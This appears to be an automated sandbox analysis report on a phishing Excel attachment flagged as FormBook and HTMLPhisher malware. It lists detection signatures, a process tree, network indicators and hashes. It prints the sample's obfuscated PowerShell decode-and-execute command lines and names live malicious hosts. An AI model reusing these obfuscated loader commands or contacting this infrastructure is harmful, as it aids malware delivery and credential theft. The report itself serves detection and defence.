Windows Analysis Report
PO#BBGR2411PO69.xls

Overview

General Information

Sample name: PO#BBGR2411PO69.xls
Analysis ID: 1566415
MD5: ff6ca372d80251aeadd10122ac4d46c0
SHA1: 26543f78c7c1bfad35c0e3e2acb9d5972cbd1257
SHA256: 8bd6a8555939af5f504e3bcadfa876e1447cadbcbd163b340cd784cafd4dfd8c
Tags: xls, user-abuse_ch
Infos:

Detection

FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3392 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3684 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3824 cmdline: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3848 cmdline: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3940 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3948 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4052 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_compiler.exe (PID: 3568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
    • mshta.exe (PID: 1520 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 2592 cmdline: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 1972 cmdline: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 2848 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2216 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2220 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_compiler.exe (PID: 3744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bf30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: powershell.exe PID: 3108 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
27.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
27.2.aspnet_compiler.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e403:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
27.2.aspnet_compiler.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
27.2.aspnet_compiler.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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
              Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3392, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 4052, ProcessName: wscript.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '…';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'…'+[CHaR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3392, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3684, ProcessName: mshta.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 4052, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3108, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3568, ProcessName: aspnet_compiler.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", ProcessId: 3940, ProcessName: csc.exe
              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.6, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS
              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 188.114.96.6, SourceIsIpv6: false, SourcePort: 443
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 4052, ProcessName: wscript.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline
              Source: Registry Key setAuthor: frack113: Data: Details: …, EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3392, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))", CommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'…
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Local\Temp\zh1bgx2j.xut.ps1

              Data Obfuscation

              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", ProcessId: 3940, ProcessName: csc.exe
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-02T07:24:37.155691+0100 | 2024197 | 1 | A Network Trojan was detected | 146.70.113.200 | 80 | 192.168.2.22 | 49162 | TCP
              2024-12-02T07:24:42.088685+0100 | 2024197 | 1 | A Network Trojan was detected | 146.70.113.200 | 80 | 192.168.2.22 | 49164 | TCP
              2024-12-02T07:24:37.155643+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49162 | 146.70.113.200 | 80 | TCP
              2024-12-02T07:24:42.088643+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 146.70.113.200 | 80 | TCP
              2024-12-02T07:25:03.187164+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49171 | 146.70.113.200 | 80 | TCP
              2024-12-02T07:25:02.943212+0100 | 2049038 | 1 | A Network Trojan was detected | 142.215.209.77 | 443 | 192.168.2.22 | 49167 | TCP
              2024-12-02T07:25:21.057960+0100 | 2049038 | 1 | A Network Trojan was detected | 142.215.209.77 | 443 | 192.168.2.22 | 49172 | TCP
              2024-12-02T07:24:49.307750+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.22 | 49165 | 146.70.113.200 | 80 | TCP

              AV Detection

              Source: PO#BBGR2411PO69.xls, Virustotal: Detection: 7%
              Source: Yara match, File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Phishing

              Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta, type: DROPPED
              Source: unknown, HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
              Source: unknown, HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: unknown, HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2
              Source: Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: 1016.filemail.com
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
